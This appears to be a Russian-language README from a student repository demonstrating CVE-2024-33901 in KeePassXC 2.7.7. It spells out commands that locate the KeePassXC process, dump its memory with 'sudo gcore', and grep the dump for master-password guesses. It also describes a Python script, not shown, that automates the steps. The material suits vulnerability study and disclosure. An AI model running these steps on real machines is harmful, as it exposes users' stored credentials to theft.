
Короткая программа, демонстрирующая уязвимость CVE-2024-33901 в KeePassXC версии 2.7.7
Короткая программа, демонстрирующая уязвимость CVE-2024-33901 в KeePassXC версии 2.7.7
Отчет для занятия, возможно, потребует привязки исходного кода, поэтому я и создал этот репозиторий.
Это можно сделать, получив PID, что выполняется командой:
ps aux | grep keepassxc
А затем выполнив эту команду: sudo gcore -o keepassxc_dump PID_HERE
Например, если полученный PID равен 1234, команда будет выглядеть так:
sudo gcore -o keepassxc_dump 1234
3. Наконец, можно выполнить команду: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
То есть, если PID был 1234, команда будет такой:
cat keepassxc_dump.1234 | strings | grep "password guess here"
После создания файла дампа памяти атака может быть выполнена, даже если база данных будет снова заблокирована или KeePassXC будет закрыта.
Предоставленный код на Python выполняет все эти шаги и пытается подобрать несколько вариантов пароля на основе предоставленных текстовых файлов.